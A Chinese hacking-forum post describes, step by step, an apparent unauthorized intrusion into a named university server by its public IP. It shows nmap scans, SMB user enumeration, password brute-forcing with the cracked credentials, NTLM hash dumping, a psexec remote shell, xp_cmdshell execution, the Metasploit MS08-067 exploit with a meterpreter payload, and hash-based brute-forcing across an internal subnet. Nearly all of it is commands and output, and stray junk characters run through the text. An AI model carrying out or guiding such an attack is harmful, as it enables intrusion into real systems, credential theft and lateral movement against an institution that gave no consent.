中国网络渗透测试联盟

标题: nmap+msf入侵广西师范 [打印本页]
作者: admin    时间: 2012-12-4 12:46
标题: nmap+msf入侵广西师范
广西师范网站http://202.103.242.241/
7 V& N: W5 q3 F* H1 H- g3 G( @1 S: x, b' f2 ~
root@bt:~# nmap -sS -sV 202.103.242.241
' n. b% v: ~7 U4 d6 K* J% h1 v" ]% O! V. D" n; `# |
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
9 l5 Y1 x8 _- J' O# X
6 }9 G9 c+ [6 eNmap scan report for bogon (202.103.242.241)
7 V, u  l) ^+ b: r' `% D4 l+ C# @
: W6 K$ I7 V3 T/ w. W0 a+ fHost is up (0.00048s latency).0 E1 x' E% f: A; V1 Z

* x. h4 U4 s6 p) d2 U  e6 mNot shown: 993 closed ports
( `! ]) Y+ }4 a/ g! H/ @' e4 }* T% O
6 r6 [: ]' c! L# T, V" \  {+ C" QPORT     STATE SERVICE       VERSION4 @+ z& L4 e) `& g0 C* C

- D; T1 |/ H9 b: w: I135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)1 w: F$ v/ j7 L9 F5 g1 z

/ B7 J" i7 b1 ~$ p9 o1 X139/tcp  open  netbios-ssn9 z; B$ L0 k  |7 d

: {* k' F- W+ j' _8 i' d/ W445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
5 Z  m* }4 U/ _; a! t: W% T0 i
  @  C& \# a' V) ]- B& ?, |3 T+ n1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
/ c3 ?  L! |: o! C3 S( t+ |6 T3 [' j2 P5 R
1026/tcp open  msrpc         Microsoft Windows RPC
8 p( N* x9 c1 i0 K" p7 M* W) h: i* ]9 x1 U1 P
3372/tcp open  msdtc?
0 t. R/ X& Q0 w" |( X3 u0 u, I* t6 T1 D6 u
3389/tcp open  ms-term-serv?
% e  f4 N% s& X$ O$ R2 a
7 i" o1 ?$ u" v% D, E! r1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
, B2 u& \2 p: B/ M; }2 cSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
8 ~, b5 S0 M+ o' ?0 L* B
( ?% |  H* T5 J0 P& r3 \% Y# |% MSFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
3 C+ ^% j% V* Q2 b% {) v8 H- z! B# t- o5 m' g, t( ~
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
& q! p, P2 S) U) |
  b: {& s( ~, D+ i+ }6 FSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO* g6 F7 g5 q0 G* w1 Q3 ~) T! V2 R) ~
/ R# i' T  y, _% R% \2 p% N
SF:ptions,6,”hO\n\x000Z”);" S; y" `6 b/ ]' @; p6 ^& J
5 W4 T: _4 q$ n& q9 g. {8 Y8 g
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)( r9 x: h  ~2 H( Z( E$ t
0 h7 }# }" w" G$ Z# e! W
Service Info: OS: Windows$ i4 y0 `5 \+ D0 X: Z

9 Q* ]! a# z) Y0 T" r* S( O. l5 LService detection performed. Please report any incorrect results at http://nmap.org/submit/ .. ^- N, ^$ Q% v- v1 e5 ]
% A  O2 C8 v) p4 F# ]
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
, a1 A; m3 B' ?5 Y& v5 x8 z, j* I# F" U
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本
$ U3 x4 e6 Q6 X1 [* U; B7 b
. ]# F1 }2 J/ g$ {5 A-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse1 v+ N8 S& u1 ~2 l) b. D: \

$ ]; s! K. e0 T: ?2 n+ d-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
. y% |% f' M  f+ m: p9 ?' H# c& J' u' h+ V
-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
+ f+ Z( }$ q5 K! I; |2 o
$ |8 c# m; G1 O$ {3 i: W-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
9 D% ]9 H& D0 ?; p; ?  s9 F0 ]
: g  e- b, I7 M8 n' `8 \-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
: E7 j9 w" K' _. K/ \
% {$ {4 ?* G2 A  G& y/ z-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse) Q# ?# D0 Z! F) }
# K& g+ b1 _, r' w) C
-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse# ]5 p" g' a4 r3 k6 B4 [2 z

7 Q8 K6 G: h5 W1 y! f7 |-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
6 \' p. p4 \, E& z9 E' z% C) @8 X
4 h. v  e* O$ Y3 J8 u) r-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse$ H- X/ j. V9 Y
- [" v5 o6 v8 O1 `) d. y
-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
* ]- t6 O! ~, G! C! R
% N& [" b2 c# a- U-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse) }; M7 L4 i* a% m# s  l1 Z9 j3 X8 x
8 v/ N: V; d% h. g5 q( k
-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse" {' y6 `# ^1 h5 w3 d4 `' O
7 p- {, T0 Z7 k" K( B' K- h
-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
5 e" F& r# a" }3 _7 K& `+ e7 b& W
6 {3 C/ ~- S+ d0 ~$ o* s+ ^-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse+ {6 m. Q  v( L$ g5 G6 C. c4 I. y

: m6 S; k* e8 ]/ u7 }" I8 u-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
; }/ B$ a' o: a  f4 Y' l+ o- J& K
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   . y* p4 c- A) M; R. W. V4 T( t

5 c6 u/ P5 U2 S2 V% s2 l( o) E( O//此乃使用脚本扫描远程机器所存在的账户名
8 [$ w1 h  q- e: S# w6 a3 A! d* f5 J7 V( B( `
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
2 _% h, G' \2 I, o, {7 G+ y1 f3 o4 l8 b' q
Nmap scan report for bogon (202.103.242.241)1 J" z# D% R- f3 f, S5 p/ Z
1 V+ h/ q1 B2 N1 ~8 C, n4 N
Host is up (0.00038s latency).$ Y. w6 I! |/ b5 Z; I  l
9 y; J- M1 e0 Y! j' u6 p
Not shown: 993 closed ports- ]  F8 ~" J# h, E+ f7 H
% Y' a7 e. F) i  J* m
PORT     STATE SERVICE
6 D  E4 T) P: f7 S5 l1 n/ g$ Y9 g- S- E2 d, A6 u) d
135/tcp  open  msrpc7 `- y  l7 @4 t2 ?

& d4 |  n7 R4 O; s  b/ x7 u% J5 i139/tcp  open  netbios-ssn  @$ y8 H$ a+ ?$ M% \

% _: ]2 X+ `% U445/tcp  open  microsoft-ds6 s( M( x3 \2 d1 ?$ x, L

9 r( q4 }2 z2 \* |2 o1025/tcp open  NFS-or-IIS
3 Q6 J% Z5 K0 N
3 {4 f+ W2 N5 ^3 O$ y. u5 v1026/tcp open  LSA-or-nterm
, b6 u- d2 t) N  K
; |2 ~2 y6 S- b3372/tcp open  msdtc& V+ r- ^, _/ b& x
7 j( y  \. j" O$ [& d( l4 m$ x
3389/tcp open  ms-term-serv
/ U' \/ z( [+ I5 b* {
# @* }& q, |4 U, o" Q) A7 l& R9 _MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)) k" ?! j# U  P+ f* I3 |

$ u6 B$ C' B9 p# ^Host script results:
7 _/ M- N1 w5 P0 X: F+ w; U
2 K, A( Y2 F6 x# R  }2 d' J| smb-enum-users:
2 u# s1 l. ?$ d( B! G. ?; |, L+ E: ?1 i- L! Z- o. w
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果8 s4 J8 m- v- ^" w. D+ m" d0 g
* ^* X, Z/ [+ U# u5 {
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds6 a+ {8 C' [" S$ c! T1 [8 T
* n4 `( l( n" A+ B' S( W8 h8 Z, Q7 T
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
8 r4 U8 T% \6 ~5 _; V8 A% D9 D% _# {1 g" W& o0 Q
//查看共享
* {* c& H9 }$ _# `% J) \' i7 A, n; l
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST; f0 }. i$ |* _5 V4 f9 N

0 x$ e: e- s: A% [/ V2 S9 uNmap scan report for bogon (202.103.242.241)
! ^; \% M. \: k" r* D% Y
+ z3 r3 Z3 x, g8 P8 ~/ vHost is up (0.00035s latency).
. O' d' P5 G+ B; {/ s- D" W: C5 O. t& m, K5 {& ^$ ~  c: P  I
Not shown: 993 closed ports
) y7 b& y! y& {( v; K* [+ ~/ |, B6 J7 L0 r
PORT     STATE SERVICE
: S" v; v8 W8 `: l9 B: a! K( W% k( b9 h  [! B
135/tcp  open  msrpc
/ Q( S3 G) r0 @6 V# i; ^  Y! f, Z" r# s  |5 p; R: h; ]2 _, j
139/tcp  open  netbios-ssn8 Y" k2 ^) W# g7 ^: _( X% c2 ^5 f3 D

5 T$ h2 `4 e) O( f, q' g! Q  M$ Y445/tcp  open  microsoft-ds
" U* @; W/ V, G. e: r+ X' r$ ^: N, B& r) S& e9 m; X
1025/tcp open  NFS-or-IIS- h' i" M3 s! z! d' c0 z
3 M4 Z3 h0 ~8 [# n! N
1026/tcp open  LSA-or-nterm
1 V+ ~' S+ X0 @1 Y# q/ D$ ], h& n' T3 y0 {; U
3372/tcp open  msdtc. B- S9 E6 Z' d5 [! c- p  j: |& [+ q
# `, f2 s- \6 W% C3 ]2 Y
3389/tcp open  ms-term-serv# E  j. ~* ^7 q0 l5 A
) V  z& }6 s$ m" O% B
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)8 T5 E& o8 f# t; B' {- I" H

9 W- ^! e, q" F5 s. |4 {Host script results:( c$ D8 N1 C; m6 H

, S3 c8 N+ Y/ h) H) Z! H( `| smb-enum-shares:( _. p3 Z, u3 ]: s* [

7 G8 t. H6 m4 a|   ADMIN$
! P+ a) N1 @6 V, }4 c# N0 r
! t% D5 S, y+ D$ x1 L|     Anonymous access: <none>
) l# H  \* ^7 a. A5 |; v& Y+ e" }! T9 d2 r1 x, |/ e  x  e, m0 h
|   C$) m$ F, q7 G2 s3 N; W

! f* A: o- p0 Q& Q|     Anonymous access: <none>
5 [$ b8 e" a9 ?: A$ i5 ]  ]* R# Y% A. g: s( w/ x0 u
|   IPC$1 {5 t' K3 J2 n

1 w  R0 C. a4 H7 T+ E$ K|_    Anonymous access: READ  x) v# ]- J; h" W3 ?! w. E0 l3 t
! I( I+ g) J- H! G
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds' T5 A% `7 [8 v9 p* C" k

, F) b8 ^# s- Y  J9 uroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241      
0 X9 s( [2 w* u2 q" U9 g
6 r  A2 u3 ^9 Q8 U5 Q//获取用户密码- K( m4 N% c6 M( H
+ E6 K+ J3 X* F+ l7 F
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
1 F8 g, i# O" ~7 ~2 E: ]7 b4 s$ T+ c
Nmap scan report for bogon (202.103.242.2418)$ w& h- }$ k3 Z; N
- i0 Y7 H3 t, A( ~) c  C' G8 w% ^
Host is up (0.00041s latency).+ _- `7 q& C, O6 i2 C) D

- o) s; S) ^' qNot shown: 993 closed ports' ~3 E8 c) Z! }/ |1 }* i% T/ ?: x" i& L

+ J* h0 \9 @) N/ cPORT     STATE SERVICE% c7 o. k. I9 j0 H& @' `+ M7 C

: ?9 |* F* q0 l! s135/tcp  open  msrpc; G7 j7 N+ W/ O- |8 B

3 c0 M/ B8 ~4 o$ R3 ?139/tcp  open  netbios-ssn) b5 \' ~" M9 A2 A/ e7 H7 q
3 t8 f* ?8 \0 i1 c) T5 J; n5 t8 l( O. ?6 q
445/tcp  open  microsoft-ds
: j0 R, ]: a3 v
1 Q" o. B. V" N( A) G! }1 o1025/tcp open  NFS-or-IIS) [& o" Z) V* D3 e' V9 L8 _

) {2 ^) X' ?; c' U! g! {1026/tcp open  LSA-or-nterm5 q. K* t  i8 F6 i
$ p- q' V& J, G( q# w7 k
3372/tcp open  msdtc4 O7 `5 b6 |! d7 P, ?+ }' v, ?
' H& Y; M$ M5 s  u
3389/tcp open  ms-term-serv" d+ T" b; [: Y0 T. k

/ i/ }9 e: ?2 K2 uMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)% }6 o# L! V" B) T# f$ |

5 D6 m; E# O# w4 @/ n3 dHost script results:
* P0 D3 ^6 R8 k' M
6 [( i+ o& L7 m8 e3 D1 b| smb-brute:
( J; B2 {& I: K8 r* F$ Q& a1 U3 A0 H" J7 I( c7 g, i5 p" _, ]
administrator:<blank> => Login was successful: ], r9 A. E- h% |

1 C3 e3 s/ Q2 D; a. e. F|_  test:123456 => Login was successful
' e# d4 O; N" D, q: ^  N+ f
' N: t, y. Y* CNmap done: 1 IP address (1 host up) scanned in 28.22 seconds7 Y& Q! F; F; t6 A
. s6 }( t# Q: ]5 ]3 F. o& X6 I
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash4 K. T* G7 x& U9 e6 j3 S  ]& J

0 a) A' _& u4 `9 P: u& L* oroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
( g/ n6 T0 m) d5 t& ^1 J5 H) \8 _8 {) d" \" o  P" n- t
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse8 E) W$ s! p8 b" {: D

) v/ i4 j4 x- A$ p# Uroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
% X8 F7 _& h/ P7 o: b$ Z2 D0 Y+ n) l* [5 P$ j* D
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
5 b; N' b1 e+ w# @, L
- G  I9 J2 N3 z* D0 k6 ^+ d; kNmap scan report for bogon (202.103.242.241)0 p+ }4 q; U7 x

3 y& O. C8 c$ ?9 f8 b; ^8 ?9 M. XHost is up (0.0012s latency).7 r3 |. }- l  F, H3 a* Y

- i. W% b+ [4 P- v. ^PORT    STATE SERVICE
' R# A% w2 g: p( }- G- j5 S8 x' ~
  v( H9 I) Z' m135/tcp open  msrpc
* |, w8 ~- y% a3 b* ~/ a9 T5 ~' e
7 M- Z; }: N2 N7 \% C6 y139/tcp open  netbios-ssn
( \3 U/ V' L1 q$ \/ O# q' X% M$ D7 }6 |) j3 q/ L2 }
445/tcp open  microsoft-ds
6 n5 q+ b* t) h! N/ J$ ~' Y, C0 k. P. y1 _0 V9 Q
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
# u' C2 i; l( Q- |  [& w8 s; t( _8 \, }3 _9 M7 `7 y7 R
Host script results:
! [2 b6 w8 V, b  _
: w3 q6 `1 g# f2 }| smb-pwdump:; A0 N3 h' s8 v1 }' R

; j) a4 w# D& j; K& q; w/ B| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************, }9 v# ]: F) y5 l& i  ]/ D

  I: G2 J& S/ Y. D4 A6 r| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
7 L, c) [( X; t4 Q. c8 f$ i$ V2 j+ C% H; C
& c2 m! E; T" E$ U9 T| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
) }5 v7 J0 e" T, s; r8 F! v, Z1 g3 }" T, v2 b: k0 d
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D26 }' b& B4 }/ k( s. u

# M0 n2 `. g% a8 m9 s5 b6 gNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
: G7 j( z( Q+ S3 C$ N) U: @1 L" i3 @( l
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell
. F% ]0 w3 ^: o! [1 v3 m: z
, l' S; h) C. d-p 123456 -e cmd.exe
2 W4 l; G& |3 d3 x8 q9 G' A) a) K5 K- z
PsExec v1.55 – Execute processes remotely5 z" M5 S' _* Q* g6 N* x

0 v+ h$ b2 T! W, ]: u. z8 `7 sCopyright (C) 2001-2004 Mark Russinovich/ F) ]. I. P+ f" J. t

% i4 e* S( i  q1 |Sysinternals – www.sysinternals.com8 N, _( v( J. [( E& _
* }; }/ E1 i- d: G$ N7 N7 G
Microsoft Windows 2000 [Version 5.00.2195]
8 j9 s+ y. q4 f+ W! C" ^2 u7 p9 z- e  }. u$ i5 V  l
(C) 版权所有 1985-2000 Microsoft Corp.: }: |: \( K: O* w* i9 o' u

' q8 d$ D+ M, X" S- f4 V& ZC:\WINNT\system32>ipconfig
& p: o5 P7 R5 v% o6 d" z
& V7 i' x* c$ Z) z$ _: v" X' bWindows 2000 IP Configuration* S8 M6 Y. r8 z1 O

4 t0 g% E/ [  A  aEthernet adapter 本地连接:
. a$ n0 b6 O4 F0 M% R1 X2 H0 E( p: P/ I6 E  B9 g$ |9 t
Connection-specific DNS Suffix  . :7 j; Z! f) ^& Y( {; t

) B& N0 `3 S/ L) {IP Address. . . . . . . . . . . . : 202.103.242.241. a. P: S- t* o- g" p1 h: Z) W

( |: F% M8 p  s& s4 ^' ASubnet Mask . . . . . . . . . . . : 255.255.255.0
) g; G6 H9 ?0 Y4 I, T# F" e
5 u* T" p1 i. YDefault Gateway . . . . . . . . . : 202.103.1.1
& \- C# e) T# p9 a  c5 W& ?; E8 X
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令
3 c- ?" K( }. P5 X1 i  \+ p! R: x+ F5 w" Q: f0 T" L) Z) W3 B/ P
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞2 s* F8 L  w3 S/ U" {. u+ N
* R1 e! L: j( y: v- |
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
9 h: ?- \0 E+ Z; Q9 M1 Q& K- |) S) b1 h, S1 k! ]  ?
Nmap scan report for bogon (202.103.242.241)
3 U( N% q5 c4 k7 h1 B! B
# u6 r( k1 b  l  d1 ?Host is up (0.00046s latency).3 h5 d; Q2 q" g8 W0 B+ u

+ Z4 B7 G* d8 H* |: \9 ^' y" ^Not shown: 993 closed ports
4 g1 O' V/ g5 S5 M: p5 O6 K) k
PORT     STATE SERVICE
& Q. @: K6 X% ]. d$ P& a2 z4 N& O3 b& v% I& I( T
135/tcp  open  msrpc
8 X0 {/ ?+ X6 Z2 S. o9 F& b7 o$ Q/ q% {0 V
139/tcp  open  netbios-ssn
7 i. B3 A+ c5 Q3 n' J9 D4 ]+ Q/ v- b# o, X' T  b% ?
445/tcp  open  microsoft-ds' E$ k: I7 A, B: V, |
& w! k+ a( f  _) |  u$ \& q& H
1025/tcp open  NFS-or-IIS7 }6 J7 c3 \5 u5 D+ v: S& q

; M1 L& X1 z+ _# }  S, S3 M+ e3 F1026/tcp open  LSA-or-nterm5 Q' J# X" Y9 n! L$ ^1 s( s2 m0 B( w
) e9 Z1 a- X) r4 l$ G
3372/tcp open  msdtc
& G% `7 w2 W; P# \7 h: y% I1 u$ ~  ?, j
6 ~1 s2 ?& W$ d+ ]* w3389/tcp open  ms-term-serv" E; d( ?( M( n" ~9 O  r

3 p% H  {* W) I& D6 LMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
& s9 a1 |( N2 x
5 g' U7 z; E5 FHost script results:' ?- \' Y7 F) L4 u* y8 E: H

8 s" P1 ~) r, c( [" a| smb-check-vulns:! j3 U' N  W0 l8 J- t. Z5 X1 i

  O6 K6 A5 T9 E7 C2 y|_  MS08-067: VULNERABLE) {6 _. i; d6 K- y3 ^

4 a2 l' L3 p. WNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
/ l! A" Z( ~; n! R9 ~/ L( p7 F' J: A5 l/ F
root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出
. m; b1 c) n: q0 e8 w) ~2 x+ W8 s) h2 L$ i9 O, L+ b' C
msf > search ms08% W7 G0 J, e1 _

$ n* S+ N. }5 U8 y; X& z! ^% [msf > use exploit/windows/smb/ms08_067_netapi
6 F5 \0 J$ A, u% i: A6 n- E
9 K" ?1 y) O6 Imsf  exploit(ms08_067_netapi) > show options
$ A) ^, j- H/ g8 `* t5 e- s! ?1 M( ?: f7 `+ }
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.2414 X1 y! d/ M, n9 T5 P2 H9 D$ J( Y

  \; j; r7 }/ [8 P9 u7 P' Dmsf  exploit(ms08_067_netapi) > show payloads
! \" _# Y# [$ D& F  t, V* e$ G
0 z8 B( R1 ]$ {7 A# v8 ~msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp/ }# y4 h0 r( j# `2 _$ n
4 ?$ }# Z) p: Q' n7 E" \
msf  exploit(ms08_067_netapi) > exploit
/ ~" G  F. [% u. p) Y
2 w) `. g$ ^, D2 n9 D" }meterpreter >' @4 h9 j+ {- i/ c" n
7 p; A; x0 x: B+ s/ i% d* F* j
Background session 2? [y/N]  (ctrl+z)
. K) Q% y3 G2 T3 R$ p1 M. i
9 o% z3 Y- q% h& y8 Emsf  exploit(ms08_067_netapi) > sessions -l- z8 {5 v* k0 t. C: a+ q
+ A( y8 F" a; i4 }2 N
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
( i; K/ m3 ~% a0 Z* L$ ?& R
) i- a1 q. D7 V7 Dtest
* b6 D0 `0 X& g6 t0 ~# h' D! ]- i- \7 O
1 `1 i/ I6 F3 a0 Y, Kadministrator: _! v  `; e6 r# ]/ I7 |

3 `8 A: h6 |5 f* y9 lroot@bt:/usr/local/share/nmap/scripts# vim password.txt; C2 y; W$ P" \
$ n: P/ S6 i# P) h- b' v
44EFCE164AB921CAAAD3B435B51404EE7 @3 ~8 }7 g% L* |

1 e8 s6 ?4 b6 R+ ?; Hroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
* v& h% h6 |& ?3 A; j0 `3 V) D* O* U8 g! s8 ^* V0 k
//利用用户名跟获取的hash尝试对整段内网进行登录
- N* N# o/ e6 O! v# y" d+ L( \, J6 W% k" U9 G# g0 O
Nmap scan report for 192.168.1.105- g0 L" Y! N4 |$ Z  r9 Q

* \* \, z( Y( u8 gHost is up (0.00088s latency).0 l$ i% D* d. k$ c
" e  m. K6 `5 x# g: e
Not shown: 993 closed ports$ f2 {3 E4 h/ ~2 }3 q

& I! o) K5 z6 D) I8 a' rPORT     STATE SERVICE& b: b' Q. B3 H3 M% A& ]

. k$ a- ^- s, F- @3 \135/tcp  open  msrpc
, k9 z5 l: C' w/ b5 [: K& H1 r: \4 x6 F  V% }3 I: G1 b3 k: @' P
139/tcp  open  netbios-ssn( y$ ]' `* [! J
4 y* l( P. M" q$ u9 ?2 I; D+ A
445/tcp  open  microsoft-ds
" n. ^' v" W$ H2 O- M: X' d( q/ E' e. U9 D: T" k: H1 n
1025/tcp open  NFS-or-IIS
/ i& M" D9 U. C/ z5 Z' h' j- [3 _- k( J8 Z1 ?$ o
1026/tcp open  LSA-or-nterm
1 ?6 Y) h. g. i$ ~" i' B/ k2 M( i/ t) ^7 H$ K* m4 E8 Q
3372/tcp open  msdtc1 m5 ]0 ^8 |8 R/ k7 [

( j  |; ?- I1 O1 d) E4 g0 G8 J# T3389/tcp open  ms-term-serv
1 y" E% c- s/ f8 E: Y6 O" c( ~9 E0 f1 v- l& U9 d! i
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems). M% S2 _+ s) m
/ \9 y6 l3 A0 O. ~% b6 K2 q
Host script results:& ^1 M. ]; A/ e

' ~8 W- _5 L; P" i| smb-brute:! |/ T& P" I) z0 |
- T# U( o1 t6 H; P5 M! f# D9 s! `
|_  administrator:<blank> => Login was successful
& a( X# P' i" x
: C0 q/ B& C9 c/ E! h( K) R, |攻击成功,一个简单的msf+nmap攻击~~·" ~& R. I: I: ^& m9 `9 ^
4 ?- j+ V+ K6 ^




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2